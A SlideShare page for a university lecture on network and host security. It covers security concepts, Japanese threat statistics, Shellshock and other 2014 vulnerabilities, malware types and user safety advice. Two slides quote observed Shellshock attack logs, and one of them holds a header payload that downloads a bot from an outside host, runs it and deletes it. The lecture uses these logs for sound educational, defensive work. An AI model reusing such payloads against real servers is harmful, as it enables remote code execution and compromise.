SlideShare a Scribd company logo

Lecture about network and host security to NII students

Download as PPTX, PDF
A
Akiumi Hasegawa

The document discusses securing IT environments and provides an overview of key topics in IT security. It begins with an anecdote from the author about receiving an email on New Year's Eve 1999 regarding attacks originating from their university network. The document then covers agendas items like keywords in security including CIA and AAA. Current security trends from the Ministry of Internal Affairs and Communication are examined, along with malware trends and the top 10 security threats. The document concludes with remarks on how to avoid malware infections through software updates, anti-malware software, firewalls, and safe email practices.

Internet
1 of 57
Downloaded 12 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
Securing your IT Environment HASEGAWA Akiumi Dept. of Information Engineering School of Engineering Chukyo University
Why I interested in the Security field. Last midnight of the last day of 20th century, I got an e-mail from US-CERT(United States Computer Emergency Response Team). On the day, we were monitoring our system behavior for Y2K problem. The e-mail asked us to shut down machines which were attacking American universities from our university network.
Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem of DNS Concluding remarks
between “internet” and “the Internet” “internet” is a term of expressing the concept of connecting networks. The Internet is a global system of interconnected computer networks that use the standard Internet protocol suite (TCP/IP) to link several billion devices worldwide. “The Internet” is not Web, Email, and so on. They are applications on IP networks.
Most famous keyword CIA C for Confidentiality only intended authorized person can access to the information I for Integrity maintaining and assuring the accuracy and consistency of data over its entire life-cycle A for Availability Authorized person can access the information anytime she/he wants
Another keyword AAA A for Authentication identifying a user A for Authorization allow the authenticated user to access services A for Accounting log the activities of users
Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
Current or on going problems Security trends from Ministry of Internal Affairs and Communication Current/On going problems
Trends in security threat http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html
Malware trend 2011 - 2013 http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.htm
Top 10 Security Threats in this year http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html RANK TYPE of THREAT AIM of ATTACK 1 Spear phishing by E-Mail information theft 2 unauthorized computer access information theft 3 Website tampering or compromising information theft, Denial of service 4 information leakage from website information theft 5 online banking attacks information theft 6 mal-application for smart phones information theft 7 unintended privacy/information leakage in SNS 8 information leakage by lost mobile hardwares 9 ransom ware a like information theft 10 Denial of Services Denial of services
Topics in last year ID and password system is about to die Severe bugs in Major Open Source Softwares Severe problems in DNS system/protcol was exposed! SSL(Secure Socket Layer) is about dying Watering hole attacks compromised GOM player site compromised EmEditor site Spear attacks Sony Picture Entertainment ICANN
ID and Password system is about to die. Brute force attacks using randomly generated string Dictionary attacks using a list/lists of commonly used passwords Password list attacks using a list of pairs of ID and password disclosed from some other services This type of attacks is very successful.
known password list attacks starting date Target Success Attacks Success Rate Nov. 2013 to Feb. 2014 Ticket Pia ? ? ? 5th, Feb. mixi 370 28th, Feb. mixi 16972 27th, May to 4th, June niconico 219926 2203590 9.98% 31st, May to 17th, June mixi 263596 19th, June to 23rd,June Ameba 38280 2293543 1.7% 23rd,June to 24th, June CAPAT 11502 ? ? 28th, June to 29th, June Bandai-Namco 14399 1796629 0.8% 1st, July to 28th, July Pointalk, goo 1265 ? ? 13th, Aug. MUJI 無印良品 20957 4220382 0.5% 15th, Aug. Suica point club 756 296000 0.3 22nd, Sep. to 23rd, Sep. MUJI 無印良品 19 18663 0.1% 25th, Sep. to 26th, Sep. Kuroneco members 10589 1900000 5.6% 27th, Sep. to 29th, Sep. docomo ID 6072 22500000 0.3% 28th, Sep. Sagawa Express 34161 ? ?
Line account Hijacking and fraud Line account hijacking is notable this year. also in Skype accounts are targeted. Hijackers ask friends to buy i-tunes cards instead of them and tell their numbers. the activities seem to be organized and controlled by existing scenarios. Line decides to introduce pin code to avoid such attacks.
Purpose of such attacks for Money or their economy? professionals said “No, may be”. They pointed out that direct monetary damages occurred in only two cases. It is said that attackers check the completeness of the lists they have. So, what comes next to these attacks?
News on Line account hijacking http://news.yahoo.co.jp/pickup/6143059
Do’s and Don’ts in account management Don’ts use easy ID and password share ID and password among services Leave PC without logout or screen lock Do’s if possible, use 2 stage authentication if not available, use strong password and memo it in some hidden place. screen lock or logout before leaving your seat
defects found in widely used systems OpenSSL severe bugs known as heart bleed raw data in server memory can be disclosed SSL 3.0 problem known as poodle encryption can be decoded DNS cache poisoning problem root can be compromised
defects found in widely used systems bash has a severe bug(known as shell shock, 24 Spet.) Web servers with CGI affect NAS(Network Attatched Storage) and home routers ntpd has a severe bug disclosed in this December for MacOS, hot fix was released This bug may affect home routers Samba problems(NAS) affect NAS(Network Attached Storage)
Observed Shell shock Attack Thu, 25 Sep 2014 02:41:59 GMT 209.126.230.72 - GET / HTTP/1.0 Accept: */* Host: () { :; }; ping -c 23 209.126.230.74 Referer: () { :; }; ping -c 11 209.126.230.74 User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash- shellshock-scan-of-internet.html) Cookie: () { :; }; ping -c 17 209.126.230.74
Observed Shell Shock Attack Sun, 28 Sep 2014 03:01:27 GMT 195.140.188.254 - GET / HTTP/1.0 Host: 150.42.6.190 User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
Do you have broadband routers ? Check the configurations ASAP. Change administration password. Operation manual can be download from manufactures site. Some of old routers have http port opened to the Internet, and the configurations can be modified by Web. If you use WiFi routers, do not use WEP! WEP has severe defects in its design. attack tools are available. Emergency patch is necessary for Allied- Telesis routers and switches Basic software of home routers has severe bug! dis
Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
Classification of Malware Virus Worm Trojan horse Spyware/Adware Ransomware/Cryptware
Computer Virus A computer virus is a software which tries to copy itself to files or application programs. If the action is successful, the computer is said infected. As side effects, it may destroy files, system, display messages, or spy information. It spreads as an attachment of email, or through compromised web pages.
Computer Worm A computer worm is a standalone program to replicate itself to other computers through networks.The famous song tells that “an inchworm is measuring the marigolds”. And computer worms propagate like such worms.Wether it harms the system or not, its activity of replication may bring heavy congestion to the Internet.
Trojan Horse A Trojan horse is a software which includes malicious codes in it. It looks like a useful/convenient application. After infection, it may collect critical information to send, open backdoors to the Inter- net to access or gain control of the system.
Spyware/Adware A spyware is a software to gather information to send outside the system. It may be installed with a installation of free softwares with/without the consumer’s consent. An adware is a software to display ads while using it. Such software is useful and free of charge, but it often bothers users by displaying advertisements.
Ransomware/Cryptware Such software is installed when you click “yes” to a red popup alert which says that “Your system is infected”. It gets control of the screen and displays “pay money” to delete it. It may encrypt files and request money to get keys to decode files.
Watering hole attack
Watering hole attack Attackers observe the behaviors of victims where they visit for information. Exploit the target Web site based on the above observation When users visit the compromised site, malware will be installed into the victims’ PCs. Attackers gain controls over those PCs.
Typical Cases of Watering hole attack GOM player distribution site GOM player distribution site was compromised PCs in the “Monju” Nuclear reactor site were compromised via GOM player update. Is installing GOM player allowed??? EmEditor update site automatic update site of EmEditor compromised No harm may be, because the downloader works when accesses come from specific IPs. ISC.ORG compromised lately The ISC recommends to those who access the site during compromise to scan their machines for malware. The ISC is the main distribution site of sendmail, bind, and so on.
Agenda Keywords in Security Current trends in security Current topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
to avoid malware infection Software update every month but not on black Tuesday(in Japan, its Wednesday), wait several days or a week. anti-malware is necessary! Windows8 has “windows defender” as default Private firewall is needed. block inward connection check outbound connection also! Do not open attachments of email so easily Do not say “yes” to pop up alerts of software instantly! Easy to say but not easy to do!
anti-malware/personal firewall may do harm false negative problems may allow intrusion or infection. virus total site is helpful when you get a file/files in doubt. false positive problems blocks necessary communication. erase or quarantine necessary files.
false positive false negative http://marginalrevolution.com/marginalrevolution/2014/05/type-i-and-type-ii- errors-simplified.html
false positive is harmful Routers of my office and home are same bland. My office to my home is 30 minites drive. Release my mobile PC from my office LAN. I connect my mobile PC to my home LAN, my personal firewall blocked all connection because of compromise of the router. And way of unlocking is not present.
My friend’s case She updates her Firefox. After update, she starts the Firefox agin. She saw a pop up querying yes or no, and she clicked “yes” almost instantly. And she has lost web connection ever. Firefox seems compromised. for your safety block connection Yes/No
recommended tools for web surfing check wether the site is using EV-SSL, especially in using online banking. useful addons for browsers Request policy for Firefox Netcraft tool bar WOT(Web of Trust) useful for Googlers useful WEB page Virus total https://www.virustotal.com/
sample of phishing site
E-Mail handling HTML format is risky embedded scripts embedded Web links phishing is done by sending email which includes faked link. phishing for WebMail account information is increasing. Be care of attached files zip encoded file is dangerous if necessary, scan by anti-malware and “virus total” before open file. spam or phishing mail may come from your friends
Can we find malware infection? It is difficult to find malware infection! Modern? malware works quietly to avoid disclosure of its existence. Types and number of malware is increasing day by day. Anti-malware vendors have difficulty in catching newly developed malware.
in case of malware infection Do’nts hide that your PC is infected. Continue using the infected system. Use “System Restore” function for recovery
in case of malware infection Do’s Stop using the infected computer! Call the incident response team or the person in charge of the network system of your section and wait his/her for suggestions!
Safe recovery procedure from infection 1. format hard disk(not quick format) 2. install system from read-only media 3. patch it 4. recover data from backup 1. backups can be contaminated.
Recovery from System troubles MacOS TimeMachine is helpful Windows 7 System Restore System Recovery
Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
SNS problems Privacy problems Cyberstalking Flaming a tweet can cause flaming Sexting/Revenge porn A leakage to the Internet is unrecoverable!
Stalking case in Zushi The murder made querying tweets to SNS to get victim’s address. He was also using popular FAQ site for victim’s address. He was also using a private detective. Zushi case on a newspaper
Don’ts in using SNS disclose geological information or other private matters check EXIF of digital photo retweet or reply to asking someone’s address or private information post private photo of yours or your friends see more, refer to this site
Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem of DNS Concluding remarks
the Basic problem on the Internet DNS is a protocol and system to convert domain names to IP address. Ill configured or ill managed home routers can be easily compromised. Intruders may change DNS server configuration. It happened in Mexico. DNS poisoning is easy. send fake query and at the same time generate and send fake answers. If poisoned, users of poisoned server could be led to the fake server. And you can imagine what happens.
DNS query mechanism from https://www.nic.ad.jp/ja/new sletter/No40/0800.html
Kamingsky attack old attack Kaminsky attack
Agenda Keywords in Security Current trends in security Current topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
Concluding Remarks Severe problems of the Internet were found in year 2014. ID and password system may end. Many new malware and tools are developing daily. Be careful when you are posting on SNS etc. Check and care your home routers, network attached storage, TV set, VDR, etc. properly. Basic knowledge about the Internet technology is important for your safety

More Related Content

What's hot (20)

PPTX
PACE-IT, Security+3.1: Types of Malware
Pace IT at Edmonds Community College
 
PDF
Cscu module 03 protecting systems using antiviruses
Alireza Ghahrood
 
PPT
System-Security-acit-Institute
ACIT Education Pvt Ltd
 
DOCX
SEC 573 Project 1 2.22.15
haney888
 
PPTX
Security threats and attacks in cyber security
Shri ramswaroop college of engineering and management
 
DOCX
Giarritano concept paper 4
leahg118
 
PPTX
Information-Security-Lecture-6.pptx
anbersattar
 
PDF
Cyber Security
Dr. Dheeraj Mehrotra (National Awardee)
 
PPTX
Information-Security-Lecture-5.pptx
anbersattar
 
PDF
Cscu module 01 foundations of security
Sejahtera Affif
 
PPTX
Information-Security-Lecture-4.pptx
anbersattar
 
PPTX
Information Technology - System Threats
Drishti Bhalla
 
PPTX
Information-Security-Lecture-7.pptx
anbersattar
 
PDF
Mobile Malware
Martin Holovský
 
PPTX
System failure
chrispaul8676
 
PDF
When developers api simplify user mode rootkits development – part ii
Yury Chemerkin
 
PDF
What is Penetration Testing?
Rapid7
 
PPSX
csa2014 IBC
apyn
 
PDF
Cscu module 06 internet security
Alireza Ghahrood
 
PDF
Modern malware and threats
Martin Holovský
 
PACE-IT, Security+3.1: Types of Malware
Pace IT at Edmonds Community College
 
Cscu module 03 protecting systems using antiviruses
Alireza Ghahrood
 
System-Security-acit-Institute
ACIT Education Pvt Ltd
 
SEC 573 Project 1 2.22.15
haney888
 
Security threats and attacks in cyber security
Shri ramswaroop college of engineering and management
 
Giarritano concept paper 4
leahg118
 
Information-Security-Lecture-6.pptx
anbersattar
 
Cyber Security
Dr. Dheeraj Mehrotra (National Awardee)
 
Information-Security-Lecture-5.pptx
anbersattar
 
Cscu module 01 foundations of security
Sejahtera Affif
 
Information-Security-Lecture-4.pptx
anbersattar
 
Information Technology - System Threats
Drishti Bhalla
 
Information-Security-Lecture-7.pptx
anbersattar
 
Mobile Malware
Martin Holovský
 
System failure
chrispaul8676
 
When developers api simplify user mode rootkits development – part ii
Yury Chemerkin
 
What is Penetration Testing?
Rapid7
 
csa2014 IBC
apyn
 
Cscu module 06 internet security
Alireza Ghahrood
 
Modern malware and threats
Martin Holovský
 

Viewers also liked (20)

PPTX
IT ELECT 4 NETWORK SECURITY LECTURE 6-5-13
Jd Mercado
 
PPTX
Lecture 07 networking
HNDE Labuduwa Galle
 
PPT
Information systems 365 lecture eight
Nicholas Davis
 
PDF
TUD CS4105 | 2015 | Lecture 1
Eelco Visser
 
PDF
Lecture12
Hardik Padhy
 
PPT
Ch16
Joe Christensen
 
PDF
Network Security Lecture
Chanankorn Jandaeng
 
PPT
E-Mail - Technical Overview
Venkatesh Iyer
 
PPT
Introduction to Computer Networks
Venkatesh Iyer
 
PDF
Security of DNS
removed_5ef8f4100b1d7e8bfe3d2dc557fe10d0
 
PPT
Introduction to Peer-to-Peer Networks
Venkatesh Iyer
 
PDF
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
BGA Cyber Security
 
PDF
SOC Ekiplerinin Problemlerine Güncel Yaklaşımlar - NETSEC
BGA Cyber Security
 
PPT
Introduction to Algorithms
Venkatesh Iyer
 
PDF
SWIFT Altyapısına Yönelik Saldırıların Teknik Analizi - NETSEC
BGA Cyber Security
 
PPT
Network Security Primer
Venkatesh Iyer
 
PPTX
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
BGA Cyber Security
 
PDF
Network Security Fundamentals
Rahmat Suhatman
 
PPTX
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
BGA Cyber Security
 
PDF
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
BGA Cyber Security
 
IT ELECT 4 NETWORK SECURITY LECTURE 6-5-13
Jd Mercado
 
Lecture 07 networking
HNDE Labuduwa Galle
 
Information systems 365 lecture eight
Nicholas Davis
 
TUD CS4105 | 2015 | Lecture 1
Eelco Visser
 
Lecture12
Hardik Padhy
 
Ch16
Joe Christensen
 
Network Security Lecture
Chanankorn Jandaeng
 
E-Mail - Technical Overview
Venkatesh Iyer
 
Introduction to Computer Networks
Venkatesh Iyer
 
Security of DNS
removed_5ef8f4100b1d7e8bfe3d2dc557fe10d0
 
Introduction to Peer-to-Peer Networks
Venkatesh Iyer
 
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
BGA Cyber Security
 
SOC Ekiplerinin Problemlerine Güncel Yaklaşımlar - NETSEC
BGA Cyber Security
 
Introduction to Algorithms
Venkatesh Iyer
 
SWIFT Altyapısına Yönelik Saldırıların Teknik Analizi - NETSEC
BGA Cyber Security
 
Network Security Primer
Venkatesh Iyer
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
BGA Cyber Security
 
Network Security Fundamentals
Rahmat Suhatman
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
BGA Cyber Security
 
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
BGA Cyber Security
 
Ad

Similar to Lecture about network and host security to NII students (20)

PDF
web-security-1215757214755670-9.pdf
LucaMartins7
 
PPT
computer_security.ppt
Asif Raza
 
PDF
Computer crimes
Muniba Bukhari
 
PDF
Information security
Appin Faridabad
 
PDF
E security and payment 2013-1
Abdelfatah hegazy
 
PPT
The Top 10/20 Internet Security Vulnerabilities – A Primer
amiable_indian
 
PPT
Introduction To Information Security
belsis
 
PPT
Ch # 10 computer security risks and safe guards
MuhammadRobeel3
 
PDF
Network monitoring white paper
Imaging Network Technology, LLC
 
PPT
Computer And Internet Security
Ashley Zimmerman
 
PPT
Computer And Internet Security
JFashant
 
PPT
Safety Plano Library June 4 Main
smeech
 
PPT
Information security in todays world
Sibghatullah Khattak
 
PPTX
information security awareness course
Abdul Manaf Vellakodath
 
PPT
091005 Internet Security
dkp205
 
DOCX
Chapter 10.0
Adebisi Tolulope
 
PPT
Volume And Vectors 090416
Anthony Arrott
 
PPT
C3
Praveen Malisetty
 
PPT
Ethical Hacking
aashish2cool4u
 
PPTX
IQT 2010 - The App Does That!?
Tyler Shields
 
web-security-1215757214755670-9.pdf
LucaMartins7
 
computer_security.ppt
Asif Raza
 
Computer crimes
Muniba Bukhari
 
Information security
Appin Faridabad
 
E security and payment 2013-1
Abdelfatah hegazy
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
amiable_indian
 
Introduction To Information Security
belsis
 
Ch # 10 computer security risks and safe guards
MuhammadRobeel3
 
Network monitoring white paper
Imaging Network Technology, LLC
 
Computer And Internet Security
Ashley Zimmerman
 
Computer And Internet Security
JFashant
 
Safety Plano Library June 4 Main
smeech
 
Information security in todays world
Sibghatullah Khattak
 
information security awareness course
Abdul Manaf Vellakodath
 
091005 Internet Security
dkp205
 
Chapter 10.0
Adebisi Tolulope
 
Volume And Vectors 090416
Anthony Arrott
 
C3
Praveen Malisetty
 
Ethical Hacking
aashish2cool4u
 
IQT 2010 - The App Does That!?
Tyler Shields
 
Ad

Recently uploaded (20)

PPTX
英国假毕业证诺森比亚大学成绩单GPA修改UNN学生卡网上可查学历成绩单
Taqyea
 
PPTX
INTEGRATION OF ICT IN LEARNING AND INCORPORATIING TECHNOLOGY
kvshardwork1235
 
PPTX
ONLINE BIRTH CERTIFICATE APPLICATION SYSYTEM PPT.pptx
ShyamasreeDutta
 
PPTX
Cost_of_Quality_Presentation_Software_Engineering.pptx
farispalayi
 
PDF
AI_MOD_1.pdf artificial intelligence notes
shreyarrce
 
PPT
Computer Securityyyyyyyy - Chapter 1.ppt
SolomonSB
 
PDF
Azure_DevOps introduction for CI/CD and Agile
henrymails
 
PPT
Agilent Optoelectronic Solutions for Mobile Application
andreashenniger2
 
PPTX
sajflsajfljsdfljslfjslfsdfas;fdsfksadfjlsdflkjslgfs;lfjlsajfl;sajfasfd.pptx
theknightme
 
PPTX
PE introd.pptxfrgfgfdgfdgfgrtretrt44t444
nepmithibai2024
 
PPT
introductio to computers by arthur janry
RamananMuthukrishnan
 
PPTX
ZARA-Case.pptx djdkkdjnddkdoodkdxjidjdnhdjjdjx
RonnelPineda2
 
PPTX
Optimization_Techniques_ML_Presentation.pptx
farispalayi
 
PPTX
Lec15_Mutability Immutability-converted.pptx
khanjahanzaib1
 
PPTX
一比一原版(LaTech毕业证)路易斯安那理工大学毕业证如何办理
Taqyea
 
PPTX
L1A Season 1 ENGLISH made by A hegy fixed
toszolder91
 
PPTX
Orchestrating things in Angular application
Peter Abraham
 
PPT
introduction to networking with basics coverage
RamananMuthukrishnan
 
PPTX
原版西班牙莱昂大学毕业证(León毕业证书)如何办理
Taqyea
 
PPTX
PM200.pptxghjgfhjghjghjghjghjghjghjghjghjghj
breadpaan921
 
英国假毕业证诺森比亚大学成绩单GPA修改UNN学生卡网上可查学历成绩单
Taqyea
 
INTEGRATION OF ICT IN LEARNING AND INCORPORATIING TECHNOLOGY
kvshardwork1235
 
ONLINE BIRTH CERTIFICATE APPLICATION SYSYTEM PPT.pptx
ShyamasreeDutta
 
Cost_of_Quality_Presentation_Software_Engineering.pptx
farispalayi
 
AI_MOD_1.pdf artificial intelligence notes
shreyarrce
 
Computer Securityyyyyyyy - Chapter 1.ppt
SolomonSB
 
Azure_DevOps introduction for CI/CD and Agile
henrymails
 
Agilent Optoelectronic Solutions for Mobile Application
andreashenniger2
 
sajflsajfljsdfljslfjslfsdfas;fdsfksadfjlsdflkjslgfs;lfjlsajfl;sajfasfd.pptx
theknightme
 
PE introd.pptxfrgfgfdgfdgfgrtretrt44t444
nepmithibai2024
 
introductio to computers by arthur janry
RamananMuthukrishnan
 
ZARA-Case.pptx djdkkdjnddkdoodkdxjidjdnhdjjdjx
RonnelPineda2
 
Optimization_Techniques_ML_Presentation.pptx
farispalayi
 
Lec15_Mutability Immutability-converted.pptx
khanjahanzaib1
 
一比一原版(LaTech毕业证)路易斯安那理工大学毕业证如何办理
Taqyea
 
L1A Season 1 ENGLISH made by A hegy fixed
toszolder91
 
Orchestrating things in Angular application
Peter Abraham
 
introduction to networking with basics coverage
RamananMuthukrishnan
 
原版西班牙莱昂大学毕业证(León毕业证书)如何办理
Taqyea
 
PM200.pptxghjgfhjghjghjghjghjghjghjghjghjghj
breadpaan921
 

Lecture about network and host security to NII students

  • 1. Securing your IT Environment HASEGAWA Akiumi Dept. of Information Engineering School of Engineering Chukyo University
  • 2. Why I interested in the Security field. Last midnight of the last day of 20th century, I got an e-mail from US-CERT(United States Computer Emergency Response Team). On the day, we were monitoring our system behavior for Y2K problem. The e-mail asked us to shut down machines which were attacking American universities from our university network.
  • 3. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem of DNS Concluding remarks
  • 4. between “internet” and “the Internet” “internet” is a term of expressing the concept of connecting networks. The Internet is a global system of interconnected computer networks that use the standard Internet protocol suite (TCP/IP) to link several billion devices worldwide. “The Internet” is not Web, Email, and so on. They are applications on IP networks.
  • 5. Most famous keyword CIA C for Confidentiality only intended authorized person can access to the information I for Integrity maintaining and assuring the accuracy and consistency of data over its entire life-cycle A for Availability Authorized person can access the information anytime she/he wants
  • 6. Another keyword AAA A for Authentication identifying a user A for Authorization allow the authenticated user to access services A for Accounting log the activities of users
  • 7. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
  • 8. Current or on going problems Security trends from Ministry of Internal Affairs and Communication Current/On going problems
  • 9. Trends in security threat http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html
  • 10. Malware trend 2011 - 2013 http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.htm
  • 11. Top 10 Security Threats in this year http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html RANK TYPE of THREAT AIM of ATTACK 1 Spear phishing by E-Mail information theft 2 unauthorized computer access information theft 3 Website tampering or compromising information theft, Denial of service 4 information leakage from website information theft 5 online banking attacks information theft 6 mal-application for smart phones information theft 7 unintended privacy/information leakage in SNS 8 information leakage by lost mobile hardwares 9 ransom ware a like information theft 10 Denial of Services Denial of services
  • 12. Topics in last year ID and password system is about to die Severe bugs in Major Open Source Softwares Severe problems in DNS system/protcol was exposed! SSL(Secure Socket Layer) is about dying Watering hole attacks compromised GOM player site compromised EmEditor site Spear attacks Sony Picture Entertainment ICANN
  • 13. ID and Password system is about to die. Brute force attacks using randomly generated string Dictionary attacks using a list/lists of commonly used passwords Password list attacks using a list of pairs of ID and password disclosed from some other services This type of attacks is very successful.
  • 14. known password list attacks starting date Target Success Attacks Success Rate Nov. 2013 to Feb. 2014 Ticket Pia ? ? ? 5th, Feb. mixi 370 28th, Feb. mixi 16972 27th, May to 4th, June niconico 219926 2203590 9.98% 31st, May to 17th, June mixi 263596 19th, June to 23rd,June Ameba 38280 2293543 1.7% 23rd,June to 24th, June CAPAT 11502 ? ? 28th, June to 29th, June Bandai-Namco 14399 1796629 0.8% 1st, July to 28th, July Pointalk, goo 1265 ? ? 13th, Aug. MUJI 無印良品 20957 4220382 0.5% 15th, Aug. Suica point club 756 296000 0.3 22nd, Sep. to 23rd, Sep. MUJI 無印良品 19 18663 0.1% 25th, Sep. to 26th, Sep. Kuroneco members 10589 1900000 5.6% 27th, Sep. to 29th, Sep. docomo ID 6072 22500000 0.3% 28th, Sep. Sagawa Express 34161 ? ?
  • 15. Line account Hijacking and fraud Line account hijacking is notable this year. also in Skype accounts are targeted. Hijackers ask friends to buy i-tunes cards instead of them and tell their numbers. the activities seem to be organized and controlled by existing scenarios. Line decides to introduce pin code to avoid such attacks.
  • 16. Purpose of such attacks for Money or their economy? professionals said “No, may be”. They pointed out that direct monetary damages occurred in only two cases. It is said that attackers check the completeness of the lists they have. So, what comes next to these attacks?
  • 17. News on Line account hijacking http://news.yahoo.co.jp/pickup/6143059
  • 18. Do’s and Don’ts in account management Don’ts use easy ID and password share ID and password among services Leave PC without logout or screen lock Do’s if possible, use 2 stage authentication if not available, use strong password and memo it in some hidden place. screen lock or logout before leaving your seat
  • 19. defects found in widely used systems OpenSSL severe bugs known as heart bleed raw data in server memory can be disclosed SSL 3.0 problem known as poodle encryption can be decoded DNS cache poisoning problem root can be compromised
  • 20. defects found in widely used systems bash has a severe bug(known as shell shock, 24 Spet.) Web servers with CGI affect NAS(Network Attatched Storage) and home routers ntpd has a severe bug disclosed in this December for MacOS, hot fix was released This bug may affect home routers Samba problems(NAS) affect NAS(Network Attached Storage)
  • 21. Observed Shell shock Attack Thu, 25 Sep 2014 02:41:59 GMT 209.126.230.72 - GET / HTTP/1.0 Accept: */* Host: () { :; }; ping -c 23 209.126.230.74 Referer: () { :; }; ping -c 11 209.126.230.74 User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash- shellshock-scan-of-internet.html) Cookie: () { :; }; ping -c 17 209.126.230.74
  • 22. Observed Shell Shock Attack Sun, 28 Sep 2014 03:01:27 GMT 195.140.188.254 - GET / HTTP/1.0 Host: 150.42.6.190 User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
  • 23. Do you have broadband routers ? Check the configurations ASAP. Change administration password. Operation manual can be download from manufactures site. Some of old routers have http port opened to the Internet, and the configurations can be modified by Web. If you use WiFi routers, do not use WEP! WEP has severe defects in its design. attack tools are available. Emergency patch is necessary for Allied- Telesis routers and switches Basic software of home routers has severe bug! dis
  • 24. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
  • 25. Classification of Malware Virus Worm Trojan horse Spyware/Adware Ransomware/Cryptware
  • 26. Computer Virus A computer virus is a software which tries to copy itself to files or application programs. If the action is successful, the computer is said infected. As side effects, it may destroy files, system, display messages, or spy information. It spreads as an attachment of email, or through compromised web pages.
  • 27. Computer Worm A computer worm is a standalone program to replicate itself to other computers through networks.The famous song tells that “an inchworm is measuring the marigolds”. And computer worms propagate like such worms.Wether it harms the system or not, its activity of replication may bring heavy congestion to the Internet.
  • 28. Trojan Horse A Trojan horse is a software which includes malicious codes in it. It looks like a useful/convenient application. After infection, it may collect critical information to send, open backdoors to the Inter- net to access or gain control of the system.
  • 29. Spyware/Adware A spyware is a software to gather information to send outside the system. It may be installed with a installation of free softwares with/without the consumer’s consent. An adware is a software to display ads while using it. Such software is useful and free of charge, but it often bothers users by displaying advertisements.
  • 30. Ransomware/Cryptware Such software is installed when you click “yes” to a red popup alert which says that “Your system is infected”. It gets control of the screen and displays “pay money” to delete it. It may encrypt files and request money to get keys to decode files.
  • 32. Watering hole attack Attackers observe the behaviors of victims where they visit for information. Exploit the target Web site based on the above observation When users visit the compromised site, malware will be installed into the victims’ PCs. Attackers gain controls over those PCs.
  • 33. Typical Cases of Watering hole attack GOM player distribution site GOM player distribution site was compromised PCs in the “Monju” Nuclear reactor site were compromised via GOM player update. Is installing GOM player allowed??? EmEditor update site automatic update site of EmEditor compromised No harm may be, because the downloader works when accesses come from specific IPs. ISC.ORG compromised lately The ISC recommends to those who access the site during compromise to scan their machines for malware. The ISC is the main distribution site of sendmail, bind, and so on.
  • 34. Agenda Keywords in Security Current trends in security Current topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
  • 35. to avoid malware infection Software update every month but not on black Tuesday(in Japan, its Wednesday), wait several days or a week. anti-malware is necessary! Windows8 has “windows defender” as default Private firewall is needed. block inward connection check outbound connection also! Do not open attachments of email so easily Do not say “yes” to pop up alerts of software instantly! Easy to say but not easy to do!
  • 36. anti-malware/personal firewall may do harm false negative problems may allow intrusion or infection. virus total site is helpful when you get a file/files in doubt. false positive problems blocks necessary communication. erase or quarantine necessary files.
